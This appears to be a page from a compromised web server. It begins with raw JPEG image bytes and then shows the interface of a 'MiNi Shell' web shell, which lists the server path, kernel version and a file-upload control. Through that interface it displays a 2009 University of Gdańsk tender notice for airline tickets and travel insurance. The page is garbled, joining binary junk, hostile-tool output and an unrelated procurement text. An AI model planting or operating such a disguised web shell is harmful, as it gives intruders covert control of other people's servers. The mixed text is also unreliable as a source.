JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/104268-N-2009.html

<p class="kh_header"><b>Gdańsk: Sukcesywna  dostawa biletów lotniczych wraz z polisami dla Uniwersytetu Gdańskiego.</b><br>
<b>Numer ogłoszenia: 104268 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet  Gdański , ul. Bażyńskiego 1A, 80-952 Gdańsk, woj. pomorskie, tel. 058 5232344, faks 058 5232484.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.univ.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna  dostawa biletów lotniczych wraz z polisami dla Uniwersytetu Gdańskiego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1        Przedmiot zamówienia.
Przedmiotem zamówienia jest obsługa zagranicznych i krajowych podróży służbowych na potrzeby Uniwersytetu Gdańskiego w terminie od dnia zawarcia umowy przez 12 miesięcy.
   
2        Zakres usług będących przedmiotem zamówienia :

1	Rezerwacje i sprzedaż biletów lotniczych według obowiązujących taryf
      określonych przez przewoźników również tzw. tanich przewoźników z
      uwzględnieniem najbardziej korzystnych taryf i tras oraz doradztwo w zakresie
      wszelkich zmian w czasie trwania podróży.
2   Przedstawianie Zamawiającemu najkorzystniejszych, dostępnych na rynku, ofert na zakup biletów lotniczych wraz z polisami, każdorazowo wraz z podaniem informacji o tym, jak  przesunięcie terminu wyjazdu np. wylot jeden dzień wcześniej powrót jeden dzień później wpłynie na zmianę ceny biletu lotniczego.
3.  Wykonawca zapewni bilety najtańsze na rynku na danej trasie(uwzględniając również ewentualne promocje i zniżki, w tym uzyskane przez zamawiającego), z uwzględnieniem warunków podróży określonych przez Zamawiającego, bezkolizyjnej realizacji połączeń  wieloetapowych i najkrótszych połączeń  na danej trasie.
4.   Po złożeniu zapotrzebowania, Wykonawca w ciągu 24 godzin od momentu otrzymania zamówienia , przedstawi zamawiającemu ofertę, w której zawarte będą do wyboru co najmniej 2 warianty przelotów z uwzględnieniem    pkt 3, Zamawiający wybiera wariant przelotu,  a  wykonawca dokonuje na tej podstawie rezerwacji biletów.
4   Zamawiający wybiera wariant  przelotu  i zgłasza Wykonawcy (osobiście, faksem, elektronicznie), potrzebę rezerwacji i zakupu biletu  podając: liczbę biletów, termin podróży, klasę podróży, miejsce wylotu i przylotu, miejsce i termin dostarczenia biletu, a Wykonawca na tej podstawie dokonuje rezerwacji biletów.
5   Wykonawca potwierdza Zamawiającemu rezerwację (faksem lub elektronicznie) z podaniem: miejsca oraz terminu wylotu oraz przylotu, klasy podróży, koszty przelotu, miejsca i termin dostarczenia biletu (biletów), na wskazany  przez Zamawiającego adres zwrotny.
            6 Zamawiający rezerwując  bilety (pkt 4), zobowiązuje wykonawcę  do wystawienia zarezerwowanego  biletu (biletów) i polisy na rzecz Zamawiającego lub osoby przez niego wskazanej.  Ubezpieczenie na czas podróży musi obejmować - 24 godzinne ubezpieczenie:
	kosztów leczenia, transportu medycznego, kosztów podróży członka rodziny, 
	następstw nieszczęśliwych wypadków, 
	utraty bagażu podróżnego, 
	odwołania lub przerwania podróży, 
	ubezpieczenia od odpowiedzialności cywilnej.
7.   Dostawa biletów i polis musi nastąpić w sposób umożliwiający  rozpoczęcie podróży  w określonym terminie, jednak nie później niż 24 godziny przed terminem planowanej podróży.
           8.   W sytuacjach nie dających się wcześniej przewidzieć  zamawiający może: odwołać rezerwację, zmienić trasę lub termin podróży, ale nie później niż  na 24 godziny przed planowanym odlotem . Jeżeli zmiana trasy i rezerwacji wiązać się będzie z koniecznością rekalkulacji ceny biletu, Zamawiający zobowiązuje się do wyrównania udokumentowanej różnicy w cenie. Poza różnicą w cenie, Wykonawca nie będzie pobierał z tego tytułu dodatkowych opłat i nie służy mu dodatkowe wynagrodzenie. 
9.   W razie zaistnienia konieczności pilnych wyjazdów Wykonawca zobowiązuje się do dołożenia  wszelkich starań  umożliwiających  taką aranżację  trasy podróży , która zapewni terminowe przybycie na miejsce przeznaczenia.  W takich sytuacjach wykonawca dostarczy bilet  wraz z polisą  w wyznaczone miejsce, jednak nie później niż w ciągu 6 godzin  od momentu złożenia zamówienia.
           10.  Bezpłatne dostarczanie dokumentów podróży (biletów), polis oraz faktur do    siedziby jednostek organizacyjnych Uniwersytetu Gdańskiego oraz  pośrednictwo między Uniwersytetem Gdańskim a przewoźnikami w sprawach   reklamacyjnych,
          11.  Posiadanie lub uruchomienie dla Zamawiającego on-line czynnego w godzinach  od 8.00 do 20.00 (7 dni w tygodniu), umożliwiającego dokonanie zmian w  rezerwacji lub rezerwacji poza godzinami otwarcia biura,
12. Wykonawca zapewni obsługę Zamawiającego minimum 6 dni w tygodniu (obsługa biura).
13.  Przydzielenie do realizacji umowy co najmniej dwóch  numerów telefonicznych ze stanowiskami rezerwacji.
14.  Każdorazowo w dniu wykupu biletu informowanie wyznaczonego pracownika
      Uniwersytetu Gdańskiego, że tego dnia upływa termin rezerwacji,
15. Każdorazowe informowanie Zamawiającego drogą elektroniczną nt. zmiany ceny   biletu, wpisania na listę rezerwową, zmiany godziny lotu, odwołanie lotu,
16.  Zapewnienie możliwości bezkosztowego zwrotu biletu w dniu jego wykupu,
17.	 Zwrot biletu w przypadku odwołania wyjazdu, zwrot części kosztów zgodnie z warunkami zastosowanej taryfy. Zwrot tych kosztów powinien nastąpić w ciągu 14 dni kalendarzowych od daty zwrotu biletu, na podstawie faktury korygującej.
18.  Wystawianie polis ubezpieczeniowych dla poszczególnych osób delegowanych za granicę, w terminach wyznaczonych przez Zamawiającego - ubezpieczenie na czas podróży (dotyczy tylko lotów międzynarodowych). 
            20. Wykonawca i Zamawiający wyznaczą osoby uprawnione do wzajemnych
       kontaktów w sprawach będących przedmiotem zamówienia.
            21. Termin płatności - 21 dni od daty otrzymania faktury przez Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 63.51.20.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Przystępując do przetargu Wykonawca zobowiązany jest do wniesienia wadium w wysokości 30.000 PLN ( trzydzieści  tysięcy złotych)         
Wadium musi zostać wniesione przed upływem terminu składania ofert.

Wadium można wnieść w formie:

   a) pieniądzu,
   b) poręczenia bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym
   c) gwarancjach  bankowych, 
   d) gwarancjach ubezpieczeniowych, 
   e) poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz.1158 oraz z 2002r. Nr 25,  poz.253,  Nr 66, poz.596 i Nr 216,  poz.1824 nr 42, poz.275 z późn. zm.).

Poręczenie, gwarancje o których mowa powyżej,  powinny być ważne przez okres związania ofertą,  złożone w formie kserokopii dołączone do oferty a oryginał dołączony do oferty w osobnej kopercie. Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania z ofertą zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust.4a i ust.5 ustawy.
Oferta nie zabezpieczona w wymaganym terminie wadium, spowoduje wykluczenie  wykonawcy przez Zamawiającego. Wadium dla konsorcjum może być wniesione przez jednego z uczestników konsorcjum. 
Gwarancja bankowa może być wystawiona przez bank krajowy lub zagraniczny. Gwarancja wystawiona przez bank zagraniczny powinna być potwierdzona przez bank krajowy.

Wadium wnoszone w  formie pieniężnej  należy  wnieść  do dnia  28.05. 2009 r.  do  godz. 11°°, przelewem na rachunek bankowy Zamawiającego :
Bank PEKAO S.A. IV O Gdańsk
54124012711111000014925434
z dopiskiem: 
sukcesywna dostawa biletów lotniczych wraz z polisami dla Uniwersytetu Gdańskiego 

Kopia dowodu wpłaty przelewu musi być potwierdzona za zgodność z oryginałem przez osobę podpisującą ofertę.
Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w oznaczonym terminie znajduje się na koncie Zamawiającego.
Zwrot oraz utrata wadium następuje zgodnie z art. 46 Ustawy Prawa Zamówień Publicznych.					
Zamawiający dokona niezwłocznie zwrotu wadium, jeżeli:

a) upłynął termin związania ofertą,
b) zostanie zawarta umowa i wniesione zabezpieczenie należytego wykonania umowy,		
c) Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte                   
     lub upłynął   termin do ich  wnoszenia. 

Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:

a) który wycofał ofertę przed upływem terminu składania ofert,
b) który został wykluczony z postępowania,
c) którego oferta została odrzucona

Wykonawca traci wadium na rzecz Zamawiającego, jeżeli:

a) odmówi podpisania umowy na warunkach określonych w ofercie,
b) nie wniósł zabezpieczenia należytego wykonania umowy na zasadach określonych w SIWZ,
c) zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie  Wykonawcy,
							
Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów Wykonawców, Zamawiający przekaże do banku niezwłocznie po zawarciu umowy z Wykonawcą,  którego ofertę wybrano lub po unieważnieniu przetargu, lecz nie  później niż następnego dnia po upływie terminu związania ofertą.		
Wykonawca, który nie wniesie wadium na zasadach określonych w SIWZ zostanie wykluczony z postępowania.
W ofercie należy podać nazwę i numer konta na jakie Zamawiający dokonuje zwrotu wadium wniesionego  w formie pieniężnej.
Ewentualne przesunięcie terminu składania ofert jest jednoznaczne z przesunięciem terminu wniesienia wadium, chyba że pismo informujące o niniejszym, stanowi inaczej.
Wadium wniesione w innej formie niż pieniądzu tzn. gwarancja jego zapłaty musi być ważna przez cały okres związania oferta czyli 60 dni, licząc od upływu terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunki udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków : 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

1) posiadają uprawnienia do wykonywania działalności lub czynności określonej przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 

2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innym podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 

3)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia 

4)  wykażą się wykonaniem  dostaw w ciągu ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres  prowadzenia działalności jest krótszy w tym okresie,  zamówień  odpowiadających swoim  rodzajem   dostawom  stanowiącym przedmiot zamówienia  z podaniem  ich   wartości, przedmiotu, dat wykonania i odbiorców  co najmniej jedną dostawę o wartości minimum 900 000,00 PLN. ( w ciągu roku zamówienia mogą być sumowane) , oraz  załączenia dokumentów potwierdzających, że dostawy  zostały wykonane należycie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, podpisane przez osoby upoważnione do reprezentowania danej firmy. 

5)  Wniesie wadium  w wysokości  30.000 PLN ( trzydzieści tysięcy złotych) , zgodnie z pkt 3.6 niniejszej SIWZ.        

Ocena spełniania powyższych warunków zostanie dokonana wg formuły spełnia - nie spełnia na podstawie dokumentów dołączonych do oferty (zgodnie z pkt 3.2. SIWZ.).
Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem Wykonawcy   z postępowania  i odrzuceniem jego oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na ofertę składają się następujące dokumenty i załączniki:

1) załącznik nr 1 (do SIWZ), wypełniony i podpisany formularz ofertowy.
2) załącznik nr 2 (do SIWZ), wypełniony i podpisany kosztorys cenowy.

3) załącznik nr 3 (do SIWZ),oświadczenie o spełnianiu warunków udziału w postępowaniu o zamówienie publiczne z art. 22 ust. 1 i art. 24 ust. 1 i 2 Prawa zamówień publicznych. W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), każdy z wykonawców zobowiązany jest do załączenia w.w. dokumentu.

4) Dowód wniesienia wadium. W przypadku wniesienia wadium w innej formie niż pieniądze należy w ofercie złożyć kopię dokumentu a oryginał dostarczyć w miejscu składania ofert  , do czasu składania ofert. 
    W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), jeden z wykonawców , upoważniony przez pozostałych jako ich reprezentant, zobowiązany jest do załączenia w.w. dokumentu.

W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu, do oferty należy dołączyć następujące dokumenty:

5) Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
     W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), każdy z wykonawców zobowiązany jest do załączenia w.w. dokumentu.

6) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania. W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), każdy z wykonawców zobowiązany jest do załączenia w.w. dokumentu.

7) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24  ust. 1 pkt 4-8 ustawy Prawo zamówień publicznych, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
    W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), każdy z wykonawców zobowiązany jest do załączenia w.w. dokumentu.


8) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy,  o braku  prawomocnego orzeczenia zakazu ubiegania się o zamówienie, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźba kary(Dz.U.z 2002r Nr 197, poz. 1161) , (dotyczy podmiotów zbiorowych - tzn. osób prawnych, jednostek organizacyjnych  nie mających osobowości prawnej, z  wyłączeniem Skarbu Państwa, spółek handlowych z udziałem Skarbu {Państwa , spółek kapitałowych w  organizacji, podmiotów w stanie likwidacji oraz przedsiębiorcy nie będących osoba fizyczną , a także zagranicznych jednostek organizacyjnych), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
    W przypadku dwóch lub  więcej wykonawców składających wspólną ofertę (ubiegających się wspólnie   o udzielenie zamówienia ), każdy z wykonawców zobowiązany jest do załączenia w.w. dokumentu.

9) Pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu   Wykonawcy  składającego ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów.

10) Akredytacja IATA uprawniająca do sprzedaży biletów lotniczych wszystkich przewoźników zrzeszonych w IATA.

W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę oraz doświadczenie, potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:

11)  załącznik nr 5 -  wykaz wykonanej  dostawy  w ciągu ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia a jeżeli okres  prowadzenia działalności jest krótszy w tym okresie,  zamówień  odpowiadających swoim  rodzajem   dostawom  stanowiącym przedmiot  zamówienia  z podaniem  ich   wartości, przedmiotu, dat wykonania i odbiorców  co najmniej jedną dostawę o wartości minimum 900 000,00 PLN. ( w ciągu roku zamówienia mogą być sumowane) , wymagają  załączenia dokumentów potwierdzających, że dostawy  zostały wykonane należycie z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, podpisane przez osoby upoważnione do reprezentowania danej firmy.  

Wymagane przez zamawiającego dokumenty winny być złożone w formie oryginałów bądź kopii poświadczonych  za zgodność z oryginałem przez Wykonawcę (osoby upoważnione do składania oświadczeń  woli w imieniu Wykonawcy).
W przypadku, gdy wykonawcę reprezentuje pełnomocnik(nicy),  do oferty musi być załączone pełnomocnictwo (oryginał lub kopię potwierdzoną za zgodność z oryginałem przez notariusza) - zawierające datę wystawienia, zakres upoważnienia, okres na które zostało wystawione oraz podpisane przez osoby reprezentujące  osobę prawną lub fizyczną.
Dokumenty muszą być wystawione zgodnie z terminami określonymi powyżej, przy czym ważny będzie również dokument wystawiony w okresie wcześniejszym,  jeżeli zostanie potwierdzony przez organ wydający w wymaganym terminie.

3.3. Okoliczności umożliwiające uzupełnianie oświadczeń i dokumentów wymaganych od wykonawców na potwierdzenie spełniania warunków udziału w postępowaniu.
   Zamawiający wzywa Wykonawców , którzy w określonym terminie nie złożyli wymaganych przez Zamawiającego oświadczeń  lub dokumentów, o których  mowa w art. 26, lub którzy nie  złożyli pełnomocnictw albo którzy nie złożyli pełnomocnictw albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art.25 ust.1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba ze mimo ich złożenia oferta Wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie Zamawiającego oświadczenia i dokumenty  powinny  potwierdzić spełnianie przez Wykonawcę  warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub  roboty budowlane  wymagań określonych przez Zamawiającego , nie później niż w dniu, w  którym upłynął termin składania ofert.
3.4 Dopuszcza się składanie jednej oferty  przez dwóch lub więcej przedsiębiorców, pod warunkiem, że taka oferta będzie spełniać następujące wymagania:
     a) oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich przedsiębiorców występujących wspólnie,
     b) przedsiębiorcy występujący wspólnie  muszą upoważnić jednego spośród siebie jako reprezentanta pozostałych, a jego upoważnienie musi być udokumentowane pełnomocnictwem podpisanym przez upełnomocnionych przedstawicieli wszystkich pozostałych przedsiębiorców,
     c) wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z przedsiębiorcą występującym jako reprezentant pozostałych.

3.5.Wykonawcy mający siedzibę  lub miejsce zamieszkania za granicą
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, przedstawia również dokumenty potwierdzające, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia:
1) Wykonawca składa dokumenty lub dokument wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające ponadto, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie
2) Dokument, o którym mowa w pkt.1  powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę  lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w  ust. 1 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepisy ust. 2 stosuje się odpowiednio.
4) Dokumenty sporządzone w języku obcym muszą być składane wraz z tłumaczeniem na język polski, poświadczonym co najmniej przez Wykonawcę

Nie spełnienie któregokolwiek z powyższych warunków spowoduje odrzucenie oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.univ.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.pdzp.univ.gda.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2009 godzina 11:00, miejsce: w siedzibie Rektoratu Uniwersytetu Gdańskiego, Gdańsk Oliwa,  ul. Bażyńskiego 1 A, pok. nr.124, I piętro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com